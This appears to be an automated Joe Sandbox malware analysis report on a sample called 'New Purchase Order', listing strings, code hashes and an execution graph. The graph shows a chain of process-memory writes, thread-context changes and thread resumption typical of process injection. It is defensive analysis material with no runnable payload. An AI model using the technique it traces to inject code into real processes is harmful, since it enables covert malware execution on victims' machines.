                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          • Opcode ID: 0ead07fd917343756a7ac2398fe0280e1bc009bf8e2bd6f728a1f95e4b709bf6
                          • Instruction ID: f572883eae0f29f72417f4667828989592dab29e72a39eee629c4133b6cd0ebd
                          • Opcode Fuzzy Hash: 0ead07fd917343756a7ac2398fe0280e1bc009bf8e2bd6f728a1f95e4b709bf6
                          • Instruction Fuzzy Hash: F321777AA00519ABDB18DFB9DC54AFEBBFCEF58644F080116E915E3200E731DA058BA1
                          Function 0115F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Re-Waiting, xrefs: 011A031E
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 011A02E7
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 011A02BD
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          • Opcode ID: 423584949611b0032a72b3b5e5cf1de769f16c7c3c675ad05c09a06d355a4260
                          • Instruction ID: e0d053c941aa2144cbd1ea07f1b375bafa88f03a2a37f4f3b42c2bcb902fa5dd
                          • Opcode Fuzzy Hash: 423584949611b0032a72b3b5e5cf1de769f16c7c3c675ad05c09a06d355a4260
                          • Instruction Fuzzy Hash: 30E1AE34608742DFD769CF28C884B6ABBE0BF88314F144A19F9A58B2D1D774D946CB52
                          Function 0116BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                          Download Yara Rule
                          Strings
                          • RTL: Re-Waiting, xrefs: 011A7BAC
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 011A7B7F
                          • RTL: Resource at %p, xrefs: 011A7B8E
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 0-871070163
                          • Opcode ID: 52982bf28faee619b422be517120f8a720d295284091f19fd37851e5e8f9249c
                          • Instruction ID: 0f0340d68244a36c2a1ab0c949e06750f4633da15346943c4d6048d20314e695
                          • Opcode Fuzzy Hash: 52982bf28faee619b422be517120f8a720d295284091f19fd37851e5e8f9249c
                          • Instruction Fuzzy Hash: E04125353047028FD72DDE29CC40B6AB7E9EF98710F000A6DE956D7290D732E515CB96
                          Function 0116B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                          Download Yara Rule
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011A728C
                          Strings
                          • RTL: Re-Waiting, xrefs: 011A72C1
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 011A7294
                          • RTL: Resource at %p, xrefs: 011A72A3
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          • Opcode ID: bf1411f63a3b69fd2c788ddc56fdca30c48910cb6df9df98eb1d637c248f524d
                          • Instruction ID: 426ff728e55ffbf004d98fdf61832e05b33bece79f8a7d3df5c6989466f8e0bf
                          • Opcode Fuzzy Hash: bf1411f63a3b69fd2c788ddc56fdca30c48910cb6df9df98eb1d637c248f524d
                          • Instruction Fuzzy Hash: 7E411435704602ABC729DE29CC41BAABBA5FF54714F104629F955DB280DB32E912C7D1
                          Function 011E2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$]:%u
                          • API String ID: 48624451-3050659472
                          • Opcode ID: 03697cde4a287856179004205a6b1cce41b44e11d18344f74e1e46e190366995
                          • Instruction ID: b57f040c31566100830cd5ed3b697b4e109e2838e97a54b3d79c8fe1223d05b4
                          • Opcode Fuzzy Hash: 03697cde4a287856179004205a6b1cce41b44e11d18344f74e1e46e190366995
                          • Instruction Fuzzy Hash: 92318672A006199FDB24DF6DDC54BEEB7FCFB48610F444556E949E3240EB309A448FA0
                          Function 01177D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-
                          • API String ID: 1302938615-2137968064
                          • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction ID: 4619ae4f4e3c9cc16f6257fc296e6d4d84e24bcf2b5af0b623a47560278e07d6
                          • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                          • Instruction Fuzzy Hash: 7491B471E002169BEF2CDF6DC988ABEBBB5EF44720F14451AE965E73C0DB3089408B52
                          Function 01139126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.1911207910.0000000001100000.00000040.00001000.00020000.00000000.sdmp, Offset: 01100000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_1100000_New Purchase Order.jbxd
                          Similarity
                          • API ID:
                          • String ID: $$@
                          • API String ID: 0-1194432280
                          • Opcode ID: 249fc58053526f7134770596893a54a7710b3d2e66548a045fe3f4aaca6d517d
                          • Instruction ID: e5815e54966b6d40d21bdd0ef86c330e109e94c5618c975efb96941d14588da6
                          • Opcode Fuzzy Hash: 249fc58053526f7134770596893a54a7710b3d2e66548a045fe3f4aaca6d517d
                          • Instruction Fuzzy Hash: D0810B72D00269ABDB399F54CC44BEEB7B8AB48754F0041DAEA19B7680D7705E84CFA0

                          Execution Graph

                          Execution Coverage:11.2%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:270
                          Total number of Limit Nodes:17
                          execution_graph 25306 312d690 25307 312d695 DuplicateHandle 25306->25307 25308 312d726 25307->25308 25316 312d040 25317 312d045 GetCurrentProcess 25316->25317 25319 312d0d8 GetCurrentThread 25317->25319 25321 312d0d1 25317->25321 25320 312d115 GetCurrentProcess 25319->25320 25322 312d10e 25319->25322 25325 312d14b 25320->25325 25321->25319 25322->25320 25323 312d173 GetCurrentThreadId 25324 312d1a4 25323->25324 25325->25323 25309 7abbaa8 25310 7abbc33 25309->25310 25311 7abbace 25309->25311 25311->25310 25313 7abb5d4 25311->25313 25314 7abbd28 PostMessageW 25313->25314 25315 7abbd94 25314->25315 25315->25311 25326 7ab871c 25327 7ab8892 25326->25327 25328 7ab8726 25326->25328 25333 7aba400 25328->25333 25352 7aba466 25328->25352 25372 7aba3f0 25328->25372 25329 7ab89d6 25334 7aba41a 25333->25334 25348 7aba422 25334->25348 25391 7abb099 25334->25391 25396 7aba81a 25334->25396 25402 7abad05 25334->25402 25409 7aba9e6 25334->25409 25417 7abb1e0 25334->25417 25421 7ababae 25334->25421 25426 7aba728 25334->25426 25432 7abac08 25334->25432 25436 7aba9a9 25334->25436 25444 7abaa6a 25334->25444 25449 7aba9b5 25334->25449 25456 7abab90 25334->25456 25461 7abae91 25334->25461 25466 7aba97f 25334->25466 25471 7abaff8 25334->25471 25476 7aba718 25334->25476 25348->25329 25353 7aba3f4 25352->25353 25354 7aba469 25352->25354 25355 7abaa6a 2 API calls 25353->25355 25356 7aba9a9 4 API calls 25353->25356 25357 7abac08 2 API calls 25353->25357 25358 7aba728 2 API calls 25353->25358 25359 7ababae 2 API calls 25353->25359 25360 7abb1e0 2 API calls 25353->25360 25361 7aba9e6 4 API calls 25353->25361 25362 7abad05 4 API calls 25353->25362 25363 7aba81a 2 API calls 25353->25363 25364 7abb099 2 API calls 25353->25364 25365 7aba718 2 API calls 25353->25365 25366 7abaff8 2 API calls 25353->25366 25367 7aba97f 2 API calls 25353->25367 25368 7aba422 25353->25368 25369 7abae91 2 API calls 25353->25369 25370 7abab90 2 API calls 25353->25370 25371 7aba9b5 2 API calls 25353->25371 25354->25329 25355->25368 25356->25368 25357->25368 25358->25368 25359->25368 25360->25368 25361->25368 25362->25368 25363->25368 25364->25368 25365->25368 25366->25368 25367->25368 25368->25329 25369->25368 25370->25368 25371->25368 25373 7aba41a 25372->25373 25374 7abaa6a 2 API calls 25373->25374 25375 7aba9a9 4 API calls 25373->25375 25376 7abac08 2 API calls 25373->25376 25377 7aba728 2 API calls 25373->25377 25378 7ababae 2 API calls 25373->25378 25379 7abb1e0 2 API calls 25373->25379 25380 7aba9e6 4 API calls 25373->25380 25381 7abad05 4 API calls 25373->25381 25382 7aba81a 2 API calls 25373->25382 25383 7abb099 2 API calls 25373->25383 25384 7aba718 2 API calls 25373->25384 25385 7abaff8 2 API calls 25373->25385 25386 7aba97f 2 API calls 25373->25386 25387 7aba422 25373->25387 25388 7abae91 2 API calls 25373->25388 25389 7abab90 2 API calls 25373->25389 25390 7aba9b5 2 API calls 25373->25390 25374->25387 25375->25387 25376->25387 25377->25387 25378->25387 25379->25387 25380->25387 25381->25387 25382->25387 25383->25387 25384->25387 25385->25387 25386->25387 25387->25329 25388->25387 25389->25387 25390->25387 25392 7abb2c1 25391->25392 25482 7abb481 25392->25482 25487 7abb490 25392->25487 25393 7abb2da 25398 7aba7db 25396->25398 25397 7aba7e4 25397->25348 25398->25397 25500 7ab82c0 25398->25500 25504 7ab82b4 25398->25504 25516 7ab8120 25402->25516 25520 7ab8128 25402->25520 25403 7aba932 25403->25348 25404 7aba920 25404->25403 25508 7ab8030 25404->25508 25512 7ab8038 25404->25512 25410 7aba9ea 25409->25410 25411 7aba920 25410->25411 25415 7ab8128 ReadProcessMemory 25410->25415 25416 7ab8120 ReadProcessMemory 25410->25416 25412 7aba932 25411->25412 25413 7ab8038 WriteProcessMemory 25411->25413 25414 7ab8030 WriteProcessMemory 25411->25414 25412->25348 25413->25411 25414->25411 25415->25411 25416->25411 25419 7ab8038 WriteProcessMemory 25417->25419 25420 7ab8030 WriteProcessMemory 25417->25420 25418 7aba9df 25418->25417 25419->25418 25420->25418 25422 7abab99 25421->25422 25424 7ab8038 WriteProcessMemory 25422->25424 25425 7ab8030 WriteProcessMemory 25422->25425 25423 7abaed6 25424->25423 25425->25423 25428 7aba75b 25426->25428 25427 7aba7e4 25427->25348 25428->25427 25430 7ab82c0 CreateProcessA 25428->25430 25431 7ab82b4 CreateProcessA 25428->25431 25429 7aba8f8 25430->25429 25431->25429 25434 7ab7a68 Wow64SetThreadContext 25432->25434 25435 7ab7a60 Wow64SetThreadContext 25432->25435 25433 7abac22 25434->25433 25435->25433 25437 7aba9b2 25436->25437 25438 7aba920 25437->25438 25442 7ab8128 ReadProcessMemory 25437->25442 25443 7ab8120 ReadProcessMemory 25437->25443 25439 7aba932 25438->25439 25440 7ab8038 WriteProcessMemory 25438->25440 25441 7ab8030 WriteProcessMemory 25438->25441 25439->25348 25440->25438 25441->25438 25442->25438 25443->25438 25447 7ab8038 WriteProcessMemory 25444->25447 25448 7ab8030 WriteProcessMemory 25444->25448 25445 7aba920 25445->25444 25446 7aba932 25445->25446 25446->25348 25447->25445 25448->25445 25451 7aba9c2 25449->25451 25450 7abb330 25450->25348 25451->25450 25452 7abb11a 25451->25452 25524 7ab7579 25451->25524 25528 7ab7580 25451->25528 25452->25348 25453 7abb036 25457 7abab99 25456->25457 25459 7ab8038 WriteProcessMemory 25457->25459 25460 7ab8030 WriteProcessMemory 25457->25460 25458 7abaed6 25459->25458 25460->25458 25462 7abae9a 25461->25462 25464 7ab8038 WriteProcessMemory 25462->25464 25465 7ab8030 WriteProcessMemory 25462->25465 25463 7abaed6 25463->25463 25464->25463 25465->25463 25467 7aba991 25466->25467 25532 7ab7f78 25467->25532 25536 7ab7f73 25467->25536 25468 7abb2ac 25472 7abb009 25471->25472 25474 7ab7579 ResumeThread 25472->25474 25475 7ab7580 ResumeThread 25472->25475 25473 7abb036 25474->25473 25475->25473 25478 7aba75b 25476->25478 25477 7aba7e4 25477->25348 25478->25477 25480 7ab82c0 CreateProcessA 25478->25480 25481 7ab82b4 CreateProcessA 25478->25481 25479 7aba8f8 25480->25479 25481->25479 25483 7abb4a5 25482->25483 25492 7ab7a68 25483->25492 25496 7ab7a60 25483->25496 25484 7abb4bb 25484->25393 25488 7abb4a5 25487->25488 25490 7ab7a68 Wow64SetThreadContext 25488->25490 25491 7ab7a60 Wow64SetThreadContext 25488->25491 25489 7abb4bb 25489->25393 25490->25489 25491->25489 25493 7ab7aad Wow64SetThreadContext 25492->25493 25495 7ab7af5 25493->25495 25495->25484 25497 7ab7a68 Wow64SetThreadContext 25496->25497 25499 7ab7af5 25497->25499 25499->25484 25501 7ab8349 25500->25501 25501->25501 25502 7ab84ae CreateProcessA 25501->25502 25503 7ab850b 25502->25503 25503->25503 25505 7ab82c0 CreateProcessA 25504->25505 25507 7ab850b 25505->25507 25507->25507 25509 7ab8038 WriteProcessMemory 25508->25509 25511 7ab80d7 25509->25511 25511->25404 25513 7ab8080 WriteProcessMemory 25512->25513 25515 7ab80d7 25513->25515 25515->25404 25517 7ab8128 ReadProcessMemory 25516->25517 25519 7ab81b7 25517->25519 25519->25404 25521 7ab8173 ReadProcessMemory 25520->25521 25523 7ab81b7 25521->25523 25523->25404 25525 7ab75c0 ResumeThread 25524->25525 25527 7ab75f1 25525->25527 25527->25453 25529 7ab75c0 ResumeThread 25528->25529 25531 7ab75f1 25529->25531 25531->25453 25533 7ab7fb8 VirtualAllocEx 25532->25533 25535 7ab7ff5 25533->25535 25535->25468 25537 7ab7fe2 VirtualAllocEx 25536->25537 25539 7ab7f76 25536->25539 25538 7ab7ff5 25537->25538 25538->25468 25539->25537 25540 3124668 25541 312467a 25540->25541 25542 3124686 25541->25542 25546 3124779 25541->25546 25551 3123e40 25542->25551 25544 31246a5 25547 312479d 25546->25547 25555 3124888 25547->25555 25559 3124879 25547->25559 25552 3123e4b 25551->25552 25567 3125c4c 25552->25567 25554 3127053 25554->25544 25557 312488d 25555->25557 25556 312498c 25556->25556 25557->25556 25563 31244c4 25557->25563 25561 3124888 25559->25561 25560 312498c 25561->25560 25562 31244c4 CreateActCtxA 25561->25562 25562->25560 25564 3125918 CreateActCtxA 25563->25564 25566 31259db 25564->25566 25568 3125c57 25567->25568 25571 3125c6c 25568->25571 25570 31270fd 25570->25554 25572 3125c77 25571->25572 25575 3125c9c 25572->25575 25574 31271da 25574->25570 25576 3125ca7 25575->25576 25579 3125ccc 25576->25579 25578 31272cd 25578->25574 25580 3125cd7 25579->25580 25582 31285cb 25580->25582 25585 312ac79 25580->25585 25581 3128609 25581->25578 25582->25581 25589 312cd69 25582->25589 25594 312acb0 25585->25594 25598 312aca0 25585->25598 25586 312ac8e 25586->25582 25590 312cd99 25589->25590 25591 312cdbd 25590->25591 25631 312cf18 25590->25631 25635 312cf28 25590->25635 25591->25581 25603 312ad97 25594->25603 25611 312ada8 25594->25611 25595 312acbf 25595->25586 25599 312acb0 25598->25599 25601 312ad97 2 API calls 25599->25601 25602 312ada8 2 API calls 25599->25602 25600 312acbf 25600->25586 25601->25600 25602->25600 25604 312adb9 25603->25604 25605 312addc 25603->25605 25604->25605 25619 312b040 25604->25619 25623 312b031 25604->25623 25605->25595 25606 312add4 25606->25605 25607 312afe0 GetModuleHandleW 25606->25607 25608 312b00d 25607->25608 25608->25595 25612 312adb9 25611->25612 25613 312addc 25611->25613 25612->25613 25617 312b040 LoadLibraryExW 25612->25617 25618 312b031 LoadLibraryExW 25612->25618 25613->25595 25614 312add4 25614->25613 25615 312afe0 GetModuleHandleW 25614->25615 25616 312b00d 25615->25616 25616->25595 25617->25614 25618->25614 25620 312b054 25619->25620 25622 312b079 25620->25622 25627 312a130 25620->25627 25622->25606 25624 312b054 25623->25624 25625 312b079 25624->25625 25626 312a130 LoadLibraryExW 25624->25626 25625->25606 25626->25625 25628 312b220 LoadLibraryExW 25627->25628 25630 312b299 25628->25630 25630->25622 25632 312cf28 25631->25632 25634 312cf6f 25632->25634 25639 312bae0 25632->25639 25634->25591 25636 312cf2d 25635->25636 25637 312cf6f 25636->25637 25638 312bae0 3 API calls 25636->25638 25637->25591 25638->25637 25640 312baeb 25639->25640 25642 312dc88 25640->25642 25643 312d2dc 25640->25643 25642->25642 25644 312d2e7 25643->25644 25645 3125ccc 3 API calls 25644->25645 25646 312dcf7 25645->25646 25646->25642

                          Executed Functions

                          Function 0312D031 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 294 312d031-312d03e 295 312d040-312d044 294->295 296 312d045-312d0cf GetCurrentProcess 294->296 295->296 300 312d0d1-312d0d7 296->300 301 312d0d8-312d10c GetCurrentThread 296->301 300->301 302 312d115-312d149 GetCurrentProcess 301->302 303 312d10e-312d114 301->303 304 312d152-312d16d call 312d618 302->304 305 312d14b-312d151 302->305 303->302 309 312d173-312d1a2 GetCurrentThreadId 304->309 305->304 310 312d1a4-312d1aa 309->310 311 312d1ab-312d20d 309->311 310->311
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0312D0BE
                          • GetCurrentThread.KERNEL32 ref: 0312D0FB
                          • GetCurrentProcess.KERNEL32 ref: 0312D138
                          • GetCurrentThreadId.KERNEL32 ref: 0312D191
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 4ef9ca561200882cf394efd27041058d092c76926e9dd9fa5e644b43b913db13
                          • Instruction ID: 20b393610f998f46966e5a7c05ccfebe0b7938770bf8c8d06560b001356e0a05
                          • Opcode Fuzzy Hash: 4ef9ca561200882cf394efd27041058d092c76926e9dd9fa5e644b43b913db13
                          • Instruction Fuzzy Hash: AA5145B09002498FDB14DFA9D948BDEBFF1EF88304F248469E019A7360DB759985CB66
                          Function 0312D040 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 318 312d040-312d0cf GetCurrentProcess 323 312d0d1-312d0d7 318->323 324 312d0d8-312d10c GetCurrentThread 318->324 323->324 325 312d115-312d149 GetCurrentProcess 324->325 326 312d10e-312d114 324->326 327 312d152-312d16d call 312d618 325->327 328 312d14b-312d151 325->328 326->325 332 312d173-312d1a2 GetCurrentThreadId 327->332 328->327 333 312d1a4-312d1aa 332->333 334 312d1ab-312d20d 332->334 333->334
                          APIs
                          • GetCurrentProcess.KERNEL32 ref: 0312D0BE
                          • GetCurrentThread.KERNEL32 ref: 0312D0FB
                          • GetCurrentProcess.KERNEL32 ref: 0312D138
                          • GetCurrentThreadId.KERNEL32 ref: 0312D191
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: Current$ProcessThread
                          • String ID:
                          • API String ID: 2063062207-0
                          • Opcode ID: 1ccefedf324d543484b03b2bed36877c2ada5566e5c7f8fd275fafd2a1db445a
                          • Instruction ID: a85451addd4cd10dded4652adf121b5dcc680a55e01146d68e88beff371cfd1a
                          • Opcode Fuzzy Hash: 1ccefedf324d543484b03b2bed36877c2ada5566e5c7f8fd275fafd2a1db445a
                          • Instruction Fuzzy Hash: 035134B09002498FDB14DFAAD548BDEBFF1AF48304F24C469E419A7360DB759984CF65
                          Function 07AB82B4 Relevance: 1.8, APIs: 1, Instructions: 250processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 479 7ab82b4-7ab8355 482 7ab838e-7ab83ae 479->482 483 7ab8357-7ab8361 479->483 490 7ab83b0-7ab83ba 482->490 491 7ab83e7-7ab8416 482->491 483->482 484 7ab8363-7ab8365 483->484 485 7ab8388-7ab838b 484->485 486 7ab8367-7ab8371 484->486 485->482 488 7ab8373 486->488 489 7ab8375-7ab8384 486->489 488->489 489->489 492 7ab8386 489->492 490->491 493 7ab83bc-7ab83be 490->493 497 7ab8418-7ab8422 491->497 498 7ab844f-7ab8509 CreateProcessA 491->498 492->485 495 7ab83e1-7ab83e4 493->495 496 7ab83c0-7ab83ca 493->496 495->491 499 7ab83ce-7ab83dd 496->499 500 7ab83cc 496->500 497->498 502 7ab8424-7ab8426 497->502 511 7ab850b-7ab8511 498->511 512 7ab8512-7ab8598 498->512 499->499 501 7ab83df 499->501 500->499 501->495 503 7ab8449-7ab844c 502->503 504 7ab8428-7ab8432 502->504 503->498 506 7ab8436-7ab8445 504->506 507 7ab8434 504->507 506->506 509 7ab8447 506->509 507->506 509->503 511->512 522 7ab859a-7ab859e 512->522 523 7ab85a8-7ab85ac 512->523 522->523 524 7ab85a0 522->524 525 7ab85ae-7ab85b2 523->525 526 7ab85bc-7ab85c0 523->526 524->523 525->526 527 7ab85b4 525->527 528 7ab85c2-7ab85c6 526->528 529 7ab85d0-7ab85d4 526->529 527->526 528->529 530 7ab85c8 528->530 531 7ab85e6-7ab85ed 529->531 532 7ab85d6-7ab85dc 529->532 530->529 533 7ab85ef-7ab85fe 531->533 534 7ab8604 531->534 532->531 533->534 536 7ab8605 534->536 536->536
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AB84F6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 20fc9f7f884b8719ecf64a1b5186801c6b2ed9fa1a34f77c7471b088dff0d8cf
                          • Instruction ID: 5a603430dc761fadc75f34795cf44ba9288f5a4dc9ceb5ad042a8d1248cdde3c
                          • Opcode Fuzzy Hash: 20fc9f7f884b8719ecf64a1b5186801c6b2ed9fa1a34f77c7471b088dff0d8cf
                          • Instruction Fuzzy Hash: D4A191B1D0021ADFDB24CF68C880BDDBBBAFF44310F148569E859A7241DB789985CF92
                          Function 07AB82C0 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 537 7ab82c0-7ab8355 539 7ab838e-7ab83ae 537->539 540 7ab8357-7ab8361 537->540 547 7ab83b0-7ab83ba 539->547 548 7ab83e7-7ab8416 539->548 540->539 541 7ab8363-7ab8365 540->541 542 7ab8388-7ab838b 541->542 543 7ab8367-7ab8371 541->543 542->539 545 7ab8373 543->545 546 7ab8375-7ab8384 543->546 545->546 546->546 549 7ab8386 546->549 547->548 550 7ab83bc-7ab83be 547->550 554 7ab8418-7ab8422 548->554 555 7ab844f-7ab8509 CreateProcessA 548->555 549->542 552 7ab83e1-7ab83e4 550->552 553 7ab83c0-7ab83ca 550->553 552->548 556 7ab83ce-7ab83dd 553->556 557 7ab83cc 553->557 554->555 559 7ab8424-7ab8426 554->559 568 7ab850b-7ab8511 555->568 569 7ab8512-7ab8598 555->569 556->556 558 7ab83df 556->558 557->556 558->552 560 7ab8449-7ab844c 559->560 561 7ab8428-7ab8432 559->561 560->555 563 7ab8436-7ab8445 561->563 564 7ab8434 561->564 563->563 566 7ab8447 563->566 564->563 566->560 568->569 579 7ab859a-7ab859e 569->579 580 7ab85a8-7ab85ac 569->580 579->580 581 7ab85a0 579->581 582 7ab85ae-7ab85b2 580->582 583 7ab85bc-7ab85c0 580->583 581->580 582->583 584 7ab85b4 582->584 585 7ab85c2-7ab85c6 583->585 586 7ab85d0-7ab85d4 583->586 584->583 585->586 587 7ab85c8 585->587 588 7ab85e6-7ab85ed 586->588 589 7ab85d6-7ab85dc 586->589 587->586 590 7ab85ef-7ab85fe 588->590 591 7ab8604 588->591 589->588 590->591 593 7ab8605 591->593 593->593
                          APIs
                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 07AB84F6
                          Memory Dump Source
                          • Source File: 00000009.00000002.1854838015.0000000007AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AB0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_7ab0000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: 28a48d03456346ab6cfebc2ed9afff9a305d3a197b3f7abe4cd5aa1982b3bf8b
                          • Instruction ID: bd9d5e979bdab597266bacd9f8208cc7a4a69dc1ef75751aafcd175b280e048c
                          • Opcode Fuzzy Hash: 28a48d03456346ab6cfebc2ed9afff9a305d3a197b3f7abe4cd5aa1982b3bf8b
                          • Instruction Fuzzy Hash: B09181B1D0021ADFDB24CF68C881BDDBBB9FF44310F148569D819A7251DB789985CF92
                          Function 0312ADA8 Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 594 312ada8-312adb7 595 312ade3-312ade7 594->595 596 312adb9-312adc6 call 312a0cc 594->596 598 312adfb-312ae3c 595->598 599 312ade9-312adf3 595->599 602 312adc8 596->602 603 312addc 596->603 605 312ae49-312ae57 598->605 606 312ae3e-312ae46 598->606 599->598 649 312adce call 312b040 602->649 650 312adce call 312b031 602->650 603->595 607 312ae7b-312ae7d 605->607 608 312ae59-312ae5e 605->608 606->605 610 312ae80-312ae87 607->610 611 312ae60-312ae67 call 312a0d8 608->611 612 312ae69 608->612 609 312add4-312add6 609->603 613 312af18-312afd8 609->613 616 312ae94-312ae9b 610->616 617 312ae89-312ae91 610->617 614 312ae6b-312ae79 611->614 612->614 644 312afe0-312b00b GetModuleHandleW 613->644 645 312afda-312afdd 613->645 614->610 620 312aea8-312aeaa call 312a0e8 616->620 621 312ae9d-312aea5 616->621 617->616 624 312aeaf-312aeb1 620->624 621->620 625 312aeb3-312aebb 624->625 626 312aebe-312aec3 624->626 625->626 627 312aee1-312aeee 626->627 628 312aec5-312aecc 626->628 635 312aef0-312af0e 627->635 636 312af11-312af17 627->636 628->627 630 312aece-312aede call 312a0f8 call 312a108 628->630 630->627 635->636 646 312b014-312b028 644->646 647 312b00d-312b013 644->647 645->644 647->646 649->609 650->609
                          APIs
                          • GetModuleHandleW.KERNELBASE(00000000), ref: 0312AFFE
                          Memory Dump Source
                          • Source File: 00000009.00000002.1832880847.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_3120000_ibDqDkseW.jbxd
                          Similarity
                          • API ID: HandleModule
                          • String ID:
                          • API String ID: 4139908857-0
                          • Opcode ID: 3e133bce4fccaadf7871b86e43ada1c97c4a681f671a12b33baf58f1bb20f0e1
                          • Instruction ID: 4eb2fd7ca56d6cdae1cd3d4905f6e014136853a44b00e0021044568207032b92
                          • Opcode Fuzzy Hash: 3e133bce4fccaadf7871b86e43ada1c97c4a681f671a12b33baf58f1bb20f0e1
                          • Instruction Fuzzy Hash: 22714470A00B158FD724DF29C54475ABBF5FF88200F048A2DD086DBB50DB35E86ACB94
                          Function 0312590C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
